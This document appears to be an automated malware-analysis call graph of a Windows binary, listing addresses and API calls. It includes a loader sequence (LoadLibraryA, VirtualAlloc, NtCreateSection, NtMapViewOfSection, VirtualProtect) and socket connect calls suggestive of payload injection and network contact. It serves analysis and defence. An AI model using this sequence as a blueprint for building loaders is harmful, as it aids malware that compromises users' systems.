53764->53629 53765->53658 53766->53656 53767->53666 53768->53654 53769->53686 53770->53680 53772 6c876502 53771->53772 53775 6c876460 53771->53775 53772->53707 53773 6c8764e6 LocalFree 53773->53772 53775->53773 53779 6c8929c0 wcslen 53775->53779 53780 6c85f810 6 API calls 53775->53780 53777->53693 53778->53709 53779->53775 53780->53775 53781->53741 53782->53751 53783 6c8f9aa0 SetThreadStackGuarantee 53784 6c8f9ac5 53783->53784 53785 6c8f9ad9 53784->53785 53786 6c85ac40 HeapFree 53784->53786 53787 6c85ac40 HeapFree 53785->53787 53786->53785 53788 6c8f9ae6 53787->53788 53789 6c85fa10 53790 6c85fa7e 53789->53790 53791 6c85fa25 53789->53791 53791->53790 53793 6c85f5a0 53791->53793 53794 6c85f5af 53793->53794 53795 6c85f5cb 53793->53795 53796 6c85f5dc 53794->53796 53797 6c85f5c1 53794->53797 53795->53790 53796->53795 53798 6c85ac30 3 API calls 53796->53798 53800 6c85ac60 6 API calls 53797->53800 53798->53795 53800->53795 53801 6c8521f0 53802 6c85221b 53801->53802 53803 6c85220d 53801->53803 53805 6c8523b8 memcmp 53802->53805 53806 6c8523cd 53802->53806 53807 6c9328c0 53803->53807 53805->53806 53809 6c9328dc 53807->53809 53810 6c9328f6 53807->53810 53808 6c932a66 memcmp 53808->53810 53809->53808 53809->53810 53810->53802 53811 6c867c90 53812 6c867cb0 53811->53812 53813 6c867cc5 53812->53813 53817 6c866760 HeapFree CloseHandle GetLastError 53812->53817 53815 6c867cdc 53813->53815 53816 6c85ac40 HeapFree 53813->53816 53816->53815 53817->53812 53818 4fa116c 53839 4fa2713 53818->53839 53821 4fa2713 LoadLibraryA 53822 4fa11a7 53821->53822 53823 4fa2713 LoadLibraryA 53822->53823 53824 4fa11c5 53823->53824 53825 4fa11da VirtualAlloc 53824->53825 53837 4fa11ee 53824->53837 53827 4fa1208 53825->53827 53825->53837 53826 4fa2713 LoadLibraryA 53828 4fa1286 53826->53828 53827->53826 53827->53837 53831 4fa12dc 53828->53831 53828->53837 53843 4fa251a 53828->53843 53829 4fa2713 LoadLibraryA 53829->53831 53831->53829 53832 4fa133e 53831->53832 53831->53837 53832->53837 53838 4fa13a0 53832->53838 53873 4fa02fc LoadLibraryA 53832->53873 53834 4fa1389 53834->53837 53874 4fa03f7 LoadLibraryA 53834->53874 53838->53837 53847 4fa189c 53838->53847 53840 4fa272a 53839->53840 53841 4fa118f 53840->53841 53875 4fa0818 LoadLibraryA 53840->53875 53841->53821 53844 4fa252f 53843->53844 53845 4fa25a5 LoadLibraryA 53844->53845 53846 4fa25af 53844->53846 53845->53846 53846->53828 53848 4fa18d7 53847->53848 53849 4fa191e NtCreateSection 53848->53849 53850 4fa1943 53848->53850 53869 4fa1f4b 53848->53869 53849->53850 53849->53869 53851 4fa19d8 NtMapViewOfSection 53850->53851 53850->53869 53861 4fa19f8 53851->53861 53852 4fa1d21 VirtualAlloc 53857 4fa1d63 53852->53857 53853 4fa251a LoadLibraryA 53853->53861 53854 4fa251a LoadLibraryA 53860 4fa1c7f 53854->53860 53855 4fa1e14 VirtualProtect 53858 4fa1edf VirtualProtect 53855->53858 53865 4fa1e34 53855->53865 53856 4fa1d1d 53856->53852 53857->53855 53867 4fa1e01 NtMapViewOfSection 53857->53867 53857->53869 53863 4fa1f0e 53858->53863 53859 4fa25b8 LoadLibraryA 53859->53861 53860->53852 53860->53854 53860->53856 53917 4fa25b8 LoadLibraryA 53860->53917 53861->53853 53861->53859 53861->53860 53861->53869 53862 4fa2059 53862->53869 53876 2636530 6 API calls 53862->53876 53879 263811b HeapCreate 53862->53879 53880 26377a2 53862->53880 53863->53862 53863->53869 53918 4fa22cd LoadLibraryA 53863->53918 53865->53858 53868 4fa1eb9 VirtualProtect 53865->53868 53867->53855 53867->53869 53868->53865 53869->53837 53873->53834 53874->53838 53875->53840 53919 2635e40 53876->53919 53878 2636568 CreateThread WaitForSingleObject CloseHandle Sleep 53878->53869 53924 2636120 53878->53924 53879->53869 53881 26377ae ___lock_fhandle 53880->53881 53882 26377b8 HeapSetInformation 53881->53882 53884 26377c3 53881->53884 53882->53884 54368 263811b HeapCreate 53884->54368 53885 2637811 53886 263781c 53885->53886 54437 2637779 38 API calls 3 library calls 53885->54437 54369 2639bea GetModuleHandleW 53886->54369 53889 2637822 53890 263782d __RTC_Initialize 53889->53890 54438 2637779 38 API calls 3 library calls 53889->54438 54388 263b2f6 GetStartupInfoW 53890->54388 53893 2637847 GetCommandLineW 54401 263b29e GetEnvironmentStringsW 53893->54401 53898 2637857 54408 263b1f0 GetModuleFileNameW 53898->54408 53901 263786c 54414 263afbe 53901->54414 53904 2637872 53905 263787d 53904->53905 54441 2638406 38 API calls 3 library calls 53904->54441 54428 26381e5 53905->54428 53908 2637885 53917->53860 53918->53862 53920 2635e53 _memset 53919->53920 53923 2636042 _memset 53919->53923 53921 2635ff5 RegOpenKeyExW 53920->53921 53922 263602b RegQueryValueExW 53921->53922 53921->53923 53922->53923 53923->53878 53943 2637734 53924->53943 53929 263617b 53931 26370d7 45 API calls 53929->53931 53932 263618d 53931->53932 53939 26361a0 53932->53939 53959 2635a30 CreateEventW 53932->53959 53934 2637228 38 API calls __wsetenvp 53934->53939 53935 2637734 39 API calls 53936 26362b7 Sleep 53935->53936 53937 2637734 39 API calls 53936->53937 53937->53939 53938 2636308 CreateEventA 54002 2633140 GetCurrentThreadId 53938->54002 53939->53934 53939->53935 53939->53938 53940 2636351 WaitForSingleObject 53939->53940 53981 2632d80 ResetEvent InterlockedExchange timeGetTime socket 53939->53981 53940->53939 53944 263771e 53943->53944 54018 263af52 53944->54018 53947 26370d7 53949 26370e1 53947->53949 53950 263616d 53949->53950 53955 26370fd std::exception::exception 53949->53955 54036 2637043 53949->54036 54053 2638641 RtlDecodePointer 53949->54053 53950->53929 54017 2632c60 8 API calls __crtGetStringTypeA_stat 53950->54017 53952 263713b 54057 2636fe4 38 API calls std::exception::operator= 53952->54057 53954 2637145 54058 263790d RaiseException 53954->54058 53955->53952 54054 26375a9 53955->54054 53958 2637156 53960 2635a93 53959->53960 53961 2635a89 53959->53961 54109 26365d0 HeapCreate 53960->54109 54115 2631280 RtlDeleteCriticalSection RaiseException __CxxThrowException@8 53961->54115 53965 2635b22 54116 2631280 RtlDeleteCriticalSection RaiseException __CxxThrowException@8 53965->54116 53966 2635b2c 53970 2635b6f 53966->53970 54117 2631280 RtlDeleteCriticalSection RaiseException __CxxThrowException@8 53966->54117 53969 2635b94 53972 2635bb9 InitializeCriticalSectionAndSpinCount 53969->53972 54119 2631280 RtlDeleteCriticalSection RaiseException __CxxThrowException@8 53969->54119 53970->53969 54118 2631280 RtlDeleteCriticalSection RaiseException __CxxThrowException@8 53970->54118 53974 2635c87 InitializeCriticalSectionAndSpinCount 53972->53974 53975 2635c7d 53972->53975 53977 2635ca8 InterlockedExchange timeGetTime 53974->53977 53978 2635c9e 53974->53978 54120 2631280 RtlDeleteCriticalSection RaiseException __CxxThrowException@8 53975->54120 53980 2635d1d 53977->53980 54121 2631280 RtlDeleteCriticalSection RaiseException __CxxThrowException@8 53978->54121 53980->53939 53982 2632de8 53981->53982 53983 2632dfc lstrlenW WideCharToMultiByte 53981->53983 54145 26369d5 5 API calls __call_reportfault 53982->54145 53984 26369bf 53983->53984 53986 2632e22 lstrlenW WideCharToMultiByte gethostbyname 53984->53986 53988 2632e59 53986->53988 53987 2632df6 53987->53939 53989 2632e60 htons connect 53988->53989 53990 2632e96 53988->53990 53989->53990 53991 2632eab setsockopt setsockopt setsockopt setsockopt 53989->53991 54146 26369d5 5 API calls __call_reportfault 53990->54146 53994 2632f52 InterlockedExchange 53991->53994 53995 2632f24 WSAIoctl 53991->53995 53993 2632ea5 53993->53939 54124 26373db 53994->54124 53995->53994 54003 263316e 54002->54003 54004 2633158 54002->54004 54332 2631100 54003->54332 54005 2633160 InterlockedExchange 54004->54005 54005->54003 54005->54005 54007 263318f 54008 2631100 41 API calls 54007->54008 54009 26331b6 54008->54009 54340 2631060 54009->54340 54011 26331e5 54344 2633240 54011->54344 54017->53929 54021 263ad90 54018->54021 54025 263ada2 54021->54025 54022 263ada8 54032 26372cd 38 API calls __getptd_noexit 54022->54032 54024 263add1 54029 263aded wcstoxl 54024->54029 54034 263e884 GetStringTypeW 54024->54034 54025->54022 54025->54024 54026 263adad 54033 26387f3 11 API calls __controlfp_s 54026->54033 54031 2636152 Sleep 54029->54031 54035 26372cd 38 API calls __getptd_noexit 54029->54035 54031->53947 54032->54026 54033->54031 54034->54024 54035->54031 54037 26370c0 54036->54037 54045 2637051 54036->54045 54065 2638641 RtlDecodePointer 54037->54065 54039 26370c6 54066 26372cd 38 API calls __getptd_noexit 54039->54066 54042 263707f RtlAllocateHeap 54043 26370b8 54042->54043 54042->54045 54043->53949 54045->54042 54046 26370ac 54045->54046 54047 263705c 54045->54047 54051 26370aa 54045->54051 54062 2638641 RtlDecodePointer 54045->54062 54063 26372cd 38 API calls __getptd_noexit 54046->54063 54047->54045 54059 26385f9 38 API calls 2 library calls 54047->54059 54060 263844a 38 API calls 8 library calls 54047->54060 54061 2638164 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 54047->54061 54064 26372cd 38 API calls __getptd_noexit 54051->54064 54053->53949 54067 263756d 54054->54067 54056 26375b6 54056->53952 54057->53954 54058->53958 54059->54047 54060->54047 54062->54045 54063->54051 54064->54043 54065->54039 54066->54043 54068 2637579 ___lock_fhandle 54067->54068 54075 263817c 54068->54075 54074 263759a ___lock_fhandle 54074->54056 54093 263c180 54075->54093 54077 263757e 54078 2637486 54077->54078 54079 263749d 54078->54079 54082 2637518 54079->54082 54102 263a18d 39 API calls __controlfp_s 54079->54102 54081 26374c6 54081->54082 54083 26374e1 54081->54083 54084 26374f0 54081->54084 54090 26375a3 54082->54090 54103 263a130 42 API calls __realloc_crt 54083->54103 54084->54082 54086 26374ea 54084->54086 54086->54084 54089 2637506 RtlEncodePointer 54086->54089 54104 263a130 42 API calls __realloc_crt 54086->54104 54088 2637500 54088->54082 54088->54089 54089->54082 54105 2638185 54090->54105 54094 263c195 54093->54094 54095 263c1a8 RtlEnterCriticalSection 54093->54095 54100 263c0be 38 API calls 9 library calls 54094->54100 54095->54077 54097 263c19b 54097->54095 54101 2638406 38 API calls 3 library calls 54097->54101 54100->54097 54102->54081 54103->54086 54104->54088 54108 263c0a7 RtlLeaveCriticalSection 54105->54108 54107 26375a8 54107->54074 54108->54107 54110 2636601 54109->54110 54111 26365f7 54109->54111 54112 2635b02 InitializeCriticalSectionAndSpinCount 54110->54112 54123 2637009 38 API calls 2 library calls 54110->54123 54122 2631280 RtlDeleteCriticalSection RaiseException __CxxThrowException@8 54111->54122 54112->53965 54112->53966 54115->53960 54116->53966 54117->53970 54118->53969 54119->53972 54120->53974 54121->53977 54122->54110 54123->54112 54125 26373eb 54124->54125 54126 26373ff 54124->54126 54173 26372cd 38 API calls __getptd_noexit 54125->54173 54148 2639878 TlsGetValue 54126->54148 54130 26373f0 54174 26387f3 11 API calls __controlfp_s 54130->54174 54139 2632f79 54145->53987 54146->53993 54149 2637405 54148->54149 54150 263988d RtlDecodePointer TlsSetValue 54148->54150 54151 263a0e4 54149->54151 54150->54149 54153 263a0ed 54151->54153 54173->54130 54174->54139 54333 2631111 54332->54333 54334 263110b 54332->54334 54359 2636d60 54333->54359 54334->54007 54336 2631134 VirtualAlloc 54337 263116f 54336->54337 54338 263118a VirtualFree 54337->54338 54339 2631198 54337->54339 54338->54339 54339->54007 54341 2631071 54340->54341 54342 2631100 41 API calls 54341->54342 54343 2631081 54342->54343 54343->54011 54348 263325b 54344->54348 54361 2636d6d __ctrlfp __floor_pentium4 54359->54361 54360 2636d9e __ctrlfp 54360->54336 54361->54360 54362 2637ebc __floor_pentium4 54361->54362 54363 2637e99 54361->54363 54362->54360 54367 263bcbc 39 API calls 6 library calls 54362->54367 54366 263bc67 38 API calls 3 library calls 54363->54366 54366->54360 54367->54360 54368->53885 54370 2639bfe 54369->54370 54373 2639c07 TlsAlloc 54369->54373 54445 26398c9 40 API calls _free 54370->54445 54372 2639c03 54372->53889 54375 2639d60 54373->54375 54376 2639c9f 54373->54376 54375->53889 54376->54375 54446 263818e RtlEncodePointer RtlEncodePointer __init_pointers ___crtMessageBoxW __initp_misc_winsig 54376->54446 54378 2639cb5 54447 263c006 InitializeCriticalSectionAndSpinCount 54378->54447 54380 2639d5b 54448 26398c9 40 API calls _free 54380->54448 54382 2639cf4 54382->54380 54383 263a0e4 __calloc_crt 38 API calls 54382->54383 54384 2639d23 54383->54384 54384->54380 54385 2639d40 54384->54385 54386 2639906 __getptd_noexit 38 API calls 54385->54386 54387 2639d48 GetCurrentThreadId 54386->54387 54387->54375 54389 263a0e4 __calloc_crt 38 API calls 54388->54389 54390 263b314 54389->54390 54391 263b489 54390->54391 54393 263a0e4 __calloc_crt 38 API calls 54390->54393 54396 263783b 54390->54396 54397 263b409 54390->54397 54392 263b4bf GetStdHandle 54391->54392 54394 263b523 SetHandleCount 54391->54394 54395 263b4d1 GetFileType 54391->54395 54400 263b4f7 InitializeCriticalSectionAndSpinCount 54391->54400 54392->54391 54393->54390 54394->54396 54395->54391 54396->53893 54439 2638406 38 API calls 3 library calls 54396->54439 54397->54391 54398 263b440 InitializeCriticalSectionAndSpinCount 54397->54398 54399 263b435 GetFileType 54397->54399 54398->54396 54398->54397 54399->54397 54399->54398 54400->54391 54400->54396 54402 263b2b3 54401->54402 54403 263b2af 54401->54403 54449 263a09f 38 API calls _malloc 54402->54449 54403->53898 54406 263b2d5 54407 263b2dc FreeEnvironmentStringsW 54406->54407 54407->53898 54410 263b225 _wparse_cmdline 54408->54410 54409 2637861 54409->53901 54440 2638406 38 API calls 3 library calls 54409->54440 54410->54409 54411 263b262 54410->54411 54450 263a09f 38 API calls _malloc 54411->54450 54413 263b268 _wparse_cmdline 54413->54409 54415 263afd6 _wcslen 54414->54415 54419 263afce 54414->54419 54416 263a0e4 __calloc_crt 38 API calls 54415->54416 54422 263affa _wcslen 54416->54422 54417 263b050 54452 2637009 38 API calls 2 library calls 54417->54452 54419->53904 54420 263a0e4 __calloc_crt 38 API calls 54420->54422 54421 263b076 54453 2637009 38 API calls 2 library calls 54421->54453 54422->54417 54422->54419 54422->54420 54422->54421 54425 263b08d 54422->54425 54451 2637228 38 API calls __controlfp_s 54422->54451 54454 26387a1 10 API calls __call_reportfault 54425->54454 54427 263b099 54427->53904 54430 26381f3 __IsNonwritableInCurrentImage 54428->54430 54455 263c3b6 54430->54455 54431 2638211 __initterm_e 54432 26375a9 __cinit 44 API calls 54431->54432 54434 2638252 __IsNonwritableInCurrentImage 54431->54434 54433 2638232 54432->54433 54433->54434 54434->53908 54437->53886 54438->53890 54445->54372 54446->54378 54447->54382 54448->54375 54449->54406 54450->54413 54451->54422 54452->54419 54453->54419 54454->54427 54456 263c3bc RtlEncodePointer 54455->54456 54456->54456 54457 263c3d6 54456->54457 54457->54431 54474 6c866b70 54475 6c866bb3 54474->54475 54476 6c866b8e 54474->54476 54477 6c866bbc 54475->54477 54478 6c866c1d 54475->54478 54484 6c866bb1 54476->54484 54515 6c8614c0 16 API calls 54476->54515 54488 6c8a41b0 54477->54488 54478->54476 54480 6c866bc1 54478->54480 54481 6c866bd5 54480->54481 54485 6c866c31 54480->54485 54516 6c86bd00 267 API calls 54481->54516 54517 6c862dd0 89 API calls 54485->54517 54487 6c866cc8 54489 6c89e520 8 API calls 54488->54489 54490 6c8a41bb 54489->54490 54491 6c8a41bf 54490->54491 54494 6c8a41de 54490->54494 54492 6c8a41c5 54491->54492 54493 6c89c720 87 API calls 54491->54493 54492->54480 54493->54492 54495 6c8a4213 54494->54495 54518 6c8d44f0 54494->54518 54495->54480 54498 6c8a4280 54499 6c8a426e 54498->54499 54501 6c85ac40 HeapFree 54498->54501 54500 6c8d44f0 95 API calls 54499->54500 54511 6c8a4277 54499->54511 54502 6c8a42a3 54500->54502 54501->54499 54504 6c8a42f8 54502->54504 54508 6c8a42b0 54502->54508 54503 6c8a423a 54503->54499 54505 6c85ac40 HeapFree 54503->54505 54507 6c85ac40 HeapFree 54504->54507 54504->54511 54505->54499 54507->54511 54509 6c85ac40 HeapFree 54508->54509 54508->54511 54509->54511 54511->54495 54521 6c8d2a90 GetSystemInfo 54511->54521 54512 6c8a436e 54514 6c85ac40 HeapFree 54512->54514 54513 6c85ac40 HeapFree 54513->54512 54514->54495 54515->54476 54516->54484 54517->54487 54523 6c8d4600 54518->54523 54520 6c8a422d 54520->54498 54520->54503 54522 6c8a4314 54521->54522 54522->54495 54522->54512 54522->54513 54557 6c8fa540 54523->54557 54526 6c8d4717 SetLastError GetEnvironmentVariableW 54531 6c8d4679 54526->54531 54532 6c8d472f GetLastError 54526->54532 54527 6c8d465b 54529 6c85ac40 HeapFree 54527->54529 54528 6c8d462e 54528->54527 54530 6c85ac40 HeapFree 54528->54530 54535 6c8d4668 54528->54535 54529->54535 54530->54527 54531->54526 54534 6c8d4740 GetLastError 54531->54534 54537 6c8d476c 54531->54537 54532->54531 54533 6c8d47d8 GetLastError 54532->54533 54538 6c8d47b1 54533->54538 54539 6c8d47e7 54533->54539 54534->54531 54536 6c8d487a 54534->54536 54535->54520 54548 6c85ac40 HeapFree 54536->54548 54550 6c8d48b6 54536->54550 54537->54536 54542 6c8d4778 54537->54542 54543 6c8d482a 54538->54543 54544 6c85ac40 HeapFree 54538->54544 54547 6c8d47d6 54538->54547 54540 6c85ac40 HeapFree 54539->54540 54540->54538 54541 6c85ac40 HeapFree 54541->54535 54542->54538 54546 6c85ac40 HeapFree 54542->54546 54545 6c85ac40 HeapFree 54543->54545 54544->54543 54545->54547 54546->54538 54547->54535 54547->54541 54548->54550 54549 6c85ac40 HeapFree 54549->54550 54550->54549 54551 6c8d4924 54550->54551 54552 6c9459b0 83 API calls 54550->54552 54553 6c85ac40 HeapFree 54551->54553 54552->54550 54554 6c8d4936 54553->54554 54555 6c9459b0 83 API calls 54554->54555 54556 6c8d4942 54555->54556 54556->54520 54558 6c8fa55a 54557->54558 54563 6c8fa579 54557->54563 54559 6c85ac30 3 API calls 54558->54559 54558->54563 54559->54563 54560 6c8fa65b 54562 6c8d4621 54560->54562 54566 6c8bf0f0 54560->54566 54561 6c8fa630 54561->54562 54564 6c85ac40 HeapFree 54561->54564 54562->54528 54562->54531 54563->54560 54563->54561 54564->54562 54567 6c8bf109 54566->54567 54570 6c8bf159 54566->54570 54567->54570 54587 6c8be650 6 API calls 54567->54587 54569 6c8bf162 54569->54562 54570->54569 54573 6c8bf20a 54570->54573 54588 6c8be650 6 API calls 54570->54588 54572 6c8bf213 54572->54562 54573->54572 54575 6c8bf2b1 54573->54575 54589 6c8be650 6 API calls 54573->54589 54574 6c8bf35d 54579 6c8bf366 54574->54579 54581 6c8bf40d 54574->54581 54591 6c8be650 6 API calls 54574->54591 54575->54574 54577 6c8bf2ba 54575->54577 54590 6c8be650 6 API calls 54575->54590 54577->54562 54579->54562 54582 6c8bf416 54581->54582 54585 6c8bf4d3 54581->54585 54592 6c8be650 6 API calls 54581->54592 54582->54562 54586 6c8bf4dc 54585->54586 54593 6c8bf524 90 API calls 54585->54593 54586->54562 54587->54570 54588->54573 54589->54575 54590->54574 54591->54581 54592->54585 54594 6c864f70 54597 6c875f00 54594->54597 54596 6c864f7d 54598 6c876047 54597->54598 54599 6c875f18 54597->54599 54598->54596 54627 6c8f3920 memcpy GetProcessHeap HeapAlloc HeapAlloc 54599->54627 54601 6c875f2b 54684 6c8f39f0 93 API calls 54601->54684 54603 6c875f3b 54604 6c875fa4 54603->54604 54608 6c876054 54603->54608 54685 6c8f39f0 93 API calls 54604->54685 54606 6c875fb4 54609 6c875fc7 54606->54609 54610 6c875fbb 54606->54610 54607 6c876081 54613 6c9459b0 83 API calls 54607->54613 54608->54607 54689 6c874690 HeapFree 54608->54689 54686 6c8f39f0 93 API calls 54609->54686 54614 6c85ac40 HeapFree 54610->54614 54619 6c8760bb 54613->54619 54616 6c875fc4 54614->54616 54615 6c875fd4 54628 6c8e5b50 54615->54628 54616->54609 54619->54596 54627->54601 54690 6c8f3c80 54628->54690 54684->54603 54685->54606 54686->54615 54689->54607 54692 6c8f3c94 54690->54692 54693 6c8f3cc4 54692->54693 54712 6c8f3e49 54692->54712 54694 6c8f3ce6 GetEnvironmentStringsW 54693->54694 54757 6c8f3e83 54693->54757 54695 6c8f7943 GetLastError 54694->54695 54723 6c8f3cf3 54694->54723 54867 6c8f41bb 54695->54867 54698 6c8f47d9 54700 6c8f47ef 54698->54700 54701 6c8f47e3 CloseHandle 54698->54701 54699 6c8f4447 54702 6c85ac30 3 API calls 54699->54702 54701->54700 54707 6c8f448f 54702->54707 54703 6c8f47f7 54716 6c8f481b 54703->54716 54743 6c8f4983 54703->54743 54704 6c8f3e73 FreeEnvironmentStringsW 54704->54757 54705 6c8f3e6e 54705->54698 55010 6c8afbe0 84 API calls 54705->55010 54707->54867 55009 6c8c9fc0 93 API calls 54707->55009 54711 6c8f7bd2 54717 6c8f7bf2 54711->54717 54720 6c85ac40 HeapFree 54711->54720 54712->54703 54712->54705 54719 6c8f484e 54712->54719 54712->54743 54714 6c8f41c5 memcpy 54714->54757 54714->54867 54725 6c85ac30 3 API calls 54716->54725 54716->54867 54718 6c8f7c70 54717->54718 54724 6c85ac40 HeapFree 54717->54724 54721 6c8f7c77 54718->54721 54730 6c85ac40 HeapFree 54718->54730 54719->54716 54722 6c8f4852 54719->54722 54720->54717 54727 6c8f7c82 54721->54727 54740 6c85ac40 HeapFree 54721->54740 54728 6c8fa540 90 API calls 54722->54728 54723->54704 54729 6c85ac40 HeapFree 54723->54729 55003 6c8f1f60 85 API calls 54723->55003 55004 6c8c9fc0 93 API calls 54723->55004 55005 6c8b9e60 130 API calls 54723->55005 54724->54718 54731 6c8f48be 54725->54731 54726 6c8f45e5 54732 6c85ac40 HeapFree 54726->54732 54741 6c8f7f02 54727->54741 55047 6c8b0090 84 API calls 54727->55047 54733 6c8f4866 54728->54733 54729->54723 54730->54721 54736 6c8f48c9 memcpy 54731->54736 54731->54867 54738 6c8f4602 54732->54738 54904 6c8f4888 54733->54904 55012 6c8ecd40 54733->55012 54734 6c85ac30 GetProcessHeap HeapAlloc HeapAlloc 54734->54757 54735 6c8f4248 memcpy 54735->54757 54735->54867 55011 6c8fbad0 memcpy memcpy 54736->55011 54737 6c8bd390 memmove memmove 54737->54757 54738->54712 54747 6c85ac40 HeapFree 54738->54747 54740->54727 54753 6c8f7fdf CloseHandle 54741->54753 54754 6c8f7feb 54741->54754 54742 6c8f4574 CompareStringOrdinal 54756 6c8f44c4 54742->54756 54750 6c8f4abc 54743->54750 54751 6c8f4a41 54743->54751 54744 6c8f4910 54748 6c8f8220 116 API calls 54744->54748 54747->54712 54776 6c8f4938 54748->54776 54749 6c8f581f 54966 6c8f2320 54749->54966 54750->54749 55024 6c8f20f0 54750->55024 54759 6c85ac40 HeapFree 54751->54759 54751->54904 54752 6c8f42cf memcpy 55008 6c8b9e60 130 API calls 54752->55008 54753->54754 54762 6c9459b0 83 API calls 54754->54762 54755 6c8f45dc 54755->54726 54763 6c8f77f2 GetLastError 54755->54763 54756->54726 54756->54742 54756->54755 54756->54776 54757->54699 54757->54714 54757->54734 54757->54735 54757->54737 54757->54752 54764 6c85ac40 HeapFree 54757->54764 54757->54867 55006 6c8ae080 83 API calls 54757->55006 55007 6c8be1d0 86 API calls 54757->55007 54759->54904 54840 6c8f7ff4 54762->54840 54763->54867 54764->54757 54765 6c8f5828 54774 6c8f5832 54765->54774 54782 6c8f5878 54765->54782 54766 6c8f4c90 54769 6c8bf0f0 90 API calls 54766->54769 54767 6c8f6101 SetLastError GetFullPathNameW 54768 6c8f611d GetLastError 54767->54768 54767->54904 54770 6c8f631a GetLastError 54768->54770 54768->54904 54788 6c8f4d66 54769->54788 54772 6c8f6329 54770->54772 54831 6c8f5367 54770->54831 54771 6c8f6140 GetLastError 54771->54867 54771->54904 54778 6c85ac40 HeapFree 54772->54778 54773 6c8f5b03 SetLastError GetSystemDirectoryW 54779 6c8f5b17 GetLastError 54773->54779 54780 6c8f5870 54773->54780 54775 6c8f5863 54774->54775 54774->54780 54781 6c85ac40 HeapFree 54774->54781 54783 6c85ac40 HeapFree 54775->54783 54776->54751 54777 6c8fa540 90 API calls 54776->54777 54776->54867 54784 6c8f4bba 54777->54784 54778->54831 54779->54780 54785 6c8f5c1e GetLastError 54779->54785 54780->54773 54786 6c8f5b2c GetLastError 54780->54786 54827 6c8f5b58 54780->54827 54780->54904 54781->54775 54790 6c8f5a02 54782->54790 54782->54867 55031 6c8e39c0 9 API calls 54782->55031 54783->54780 54784->54751 54798 6c8ecd40 115 API calls 54784->54798 54792 6c8f5c30 54785->54792 54811 6c8f5c01 54785->54811 54786->54780 54786->54867 54787 6c85ac40 HeapFree 54810 6c8f54a0 54787->54810 54791 6c8bf0f0 90 API calls 54788->54791 54803 6c8f4dbd 54788->54803 54789 6c8f8132 54990 6c8f8220 54790->54990 54791->54803 54799 6c85ac40 HeapFree 54792->54799 54793 6c8f616b 54800 6c8f620d 54793->54800 54804 6c85ac40 HeapFree 54793->54804 54793->54867 54797 6c8f8220 116 API calls 54797->54810 54798->54751 54799->54811 54800->54766 54814 6c8f6218 54800->54814 54802 6c85ac40 HeapFree 54802->54705 54805 6c8bf0f0 90 API calls 54803->54805 54818 6c8f5343 54803->54818 54918 6c8f4e30 54803->54918 55021 6c8ec8c0 115 API calls 54803->55021 54804->54800 54805->54803 54807 6c8f62c1 SetLastError GetSystemDirectoryW 54813 6c8f62d9 GetLastError 54807->54813 54807->54814 54808 6c8f5d43 SetLastError GetWindowsDirectoryW 54815 6c8f5d57 GetLastError 54808->54815 54816 6c8f5c1c 54808->54816 54809 6c85ac40 HeapFree 54809->54780 54810->54749 54810->54787 54810->54797 54817 6c8f20f0 90 API calls 54810->54817 54829 6c8bf0f0 90 API calls 54810->54829 54810->54904 55030 6c8e39c0 9 API calls 54810->55030 54812 6c8f5c71 54811->54812 54811->54816 54819 6c85ac40 HeapFree 54811->54819 54811->54904 54820 6c85ac40 HeapFree 54812->54820 54813->54814 54821 6c8f639a GetLastError 54813->54821 54814->54807 54822 6c8f62ee GetLastError 54814->54822 54849 6c8f634c 54814->54849 54815->54816 54824 6c8f5ec4 GetLastError 54815->54824 54816->54808 54825 6c8f5d6c GetLastError 54816->54825 54861 6c8f5d98 54816->54861 54817->54810 54818->54831 54837 6c85ac40 HeapFree 54818->54837 54819->54812 54820->54816 54821->54831 54832 6c8f63a9 54821->54832 54822->54814 54822->54867 54835 6c8f5ea8 54824->54835 54836 6c8f5ed4 54824->54836 54825->54816 54825->54867 54826 6c8f5b98 54834 6c8f8220 116 API calls 54826->54834 54827->54826 54827->54867 55032 6c8e39c0 9 API calls 54827->55032 54828 6c8bf0f0 90 API calls 54828->54918 54829->54810 54830 6c8f5397 54839 6c8f53d1 54830->54839 55039 6c8fd2a0 WaitOnAddress GetLastError 54830->55039 54831->54698 54831->54705 54831->54802 54841 6c85ac40 HeapFree 54832->54841 54842 6c8f5bb1 54834->54842 54846 6c8d4600 95 API calls 54835->54846 54844 6c85ac40 HeapFree 54836->54844 54837->54831 54907 6c8f53e6 54839->54907 55023 6c8ead60 12 API calls 54839->55023 54840->54789 54852 6c85ac40 HeapFree 54840->54852 55048 6c8fbfa0 6 API calls 54840->55048 54841->54831 54845 6c8f5bc5 54842->54845 54851 6c85ac40 HeapFree 54842->54851 54844->54835 54845->54811 54854 6c85ac40 HeapFree 54845->54854 54925 6c8f5f00 54846->54925 54853 6c8f637d 54849->54853 54855 6c85ac30 3 API calls 54849->54855 54849->54867 54851->54845 54852->54840 54856 6c8f63c8 memcpy 54853->54856 54853->54867 54854->54811 54855->54853 54862 6c8f63e0 54856->54862 54897 6c8f63ee 54856->54897 54857 6c8f72f3 54870 6c8f765a CloseHandle 54857->54870 54871 6c8f7666 54857->54871 54858 6c8f698a 54865 6c8f773b 54858->54865 54874 6c85ac40 HeapFree 54858->54874 54859 6c8f5981 54859->54858 54864 6c85ac40 HeapFree 54859->54864 54860 6c8f5ddc 54868 6c8f8220 116 API calls 54860->54868 54861->54860 54861->54867 55033 6c8e39c0 9 API calls 54861->55033 54869 6c85ac40 HeapFree 54862->54869 54863 6c8f20f0 90 API calls 54863->54925 54864->54858 54865->54831 54883 6c85ac40 HeapFree 54865->54883 55046 6c8afbe0 84 API calls 54867->55046 54876 6c8f5df5 54868->54876 54869->54897 54870->54871 54877 6c8f767c 54871->54877 54878 6c8f7670 CloseHandle 54871->54878 54872 6c8f53ed 54873 6c8f5407 54872->54873 54880 6c85ac40 HeapFree 54872->54880 54882 6c8f541f 54873->54882 54888 6c85ac40 HeapFree 54873->54888 54874->54865 54875 6c8f5157 memcpy 54875->54918 54884 6c8f5e09 54876->54884 54889 6c85ac40 HeapFree 54876->54889 54885 6c8f7686 CloseHandle 54877->54885 54886 6c8f7692 54877->54886 54878->54877 54879 6c8f732d CloseHandle 54879->54857 54880->54873 54881 6c8f602c 54895 6c85ac40 HeapFree 54881->54895 54881->54904 54894 6c85ac40 HeapFree 54882->54894 54936 6c8f5450 54882->54936 54883->54831 54896 6c85ac40 HeapFree 54884->54896 54909 6c8f5e56 54884->54909 54885->54886 54891 6c8f76ab 54886->54891 54892 6c8f76c2 54886->54892 54888->54882 54889->54884 54890 6c85ac40 HeapFree 54890->54918 54899 6c8f76c0 54891->54899 55044 6c8ead60 12 API calls 54891->55044 54892->54899 55045 6c8ead60 12 API calls 54892->55045 54894->54936 54895->54904 54896->54909 54897->54831 54897->54867 54903 6c85ac30 3 API calls 